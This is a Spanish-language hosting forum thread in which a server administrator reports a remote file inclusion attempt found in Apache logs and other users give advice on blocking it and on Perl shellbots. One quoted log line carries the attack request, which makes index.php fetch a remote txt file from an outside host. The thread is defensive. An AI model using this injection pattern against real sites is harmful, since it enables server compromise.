Foros del Web » Administración de Sistemas » Cloud Computing »

Atacke por Txt

Estas en el tema de Atacke por Txt en el foro de Cloud Computing en Foros del Web. Teniendo un Dedicado, acceso Root, Centos y Cpanel. Se me a presentado el sgt problema revisando los log de un dominio, encontre esto : /usr/local/apache/domlogs/MIDOMINIO/MIDOMINIO.COM:151.197.230.235 ...
  #1 (permalink)  
Antiguo 11/08/2007, 10:20
 
Fecha de Ingreso: diciembre-2006
Mensajes: 439
Antigüedad: 17 años, 11 meses
Puntos: 1
Atacke por Txt

Teniendo un Dedicado, acceso Root, Centos y Cpanel.

Se me a presentado el sgt problema
revisando los log de un dominio, encontre esto :

/usr/local/apache/domlogs/MIDOMINIO/MIDOMINIO.COM:151.197.230.235 - - [11/Aug/2007:11:19:31 -0400] "GET /index.php?cmd=http://www.du72.com/jesus.txt? HTTP/1.1" 200 350 "http://www.MIDOMINIO.COM/index.php?cmd=http://www.du72.com/jesus.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


Obviamente que , para exponer el caso, reemplaze el dominio original por MIDOMINIO.COM.

Al parece estan usando como zombi uno de mis web para ejecutar un codigo txt externo.

Mi pregunta es, como evitar esto?
por apf , como puedo filtrar topo tipo de entrada/salida con DU72.COM ?

Algun consejo para evitar estas cosas?

Salu2
  #2 (permalink)  
Antiguo 11/08/2007, 14:02
Avatar de WebTech
Hosting Moderator
 
Fecha de Ingreso: octubre-2005
Ubicación: East Coast
Mensajes: 5.399
Antigüedad: 19 años, 1 mes
Puntos: 162
Re: Atacke por Txt

Simplemente banea la IP del server donde se aloja, según lo que vi, ese archivo no te causará ningún daño, solo hace un "echo", no van a destruir tu server por ello. Igualmente creo que sería conveniente que usaras mod_security para evitar ataques por variables en URLs.

Saludos,
__________________
Infranetworking.com - Expertos en Hosting Multidominio, Cloud Hosting, Servidores Dedicados y Administración de Servidores Linux
  #3 (permalink)  
Antiguo 02/10/2007, 20:56
 
Fecha de Ingreso: octubre-2007
Mensajes: 5
Antigüedad: 17 años, 1 mes
Puntos: 0
Re: Atacke por Txt

el problema es que algun cliente tuyo ha alojado un txt que contiene el codigo un codigo viral para reproducir mas servidores infectados.

a estos virus /malware se los conoce como Shellbots .. esos shellbots no son mas que programas en PERL que infectan servidores atravez de internet ( si servidores dedicados en linux ) y utilizan estos txt para introducir el codigo e infectar nuevamente.. cada servidor infectado baja ese codigo y lo ejecuta para infectar a otros.. es posiblemente uno de los primeros virus peligroso que afecta a sistemas LINUX y BSD .. por eso deben tomar todas las precauciones.

estos shellbots disfrazan sus procesos normalmente como procesos del apache .. pero son sencillos de detectar ya que consumen muchisimo CPU.


Saludos
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 01:00.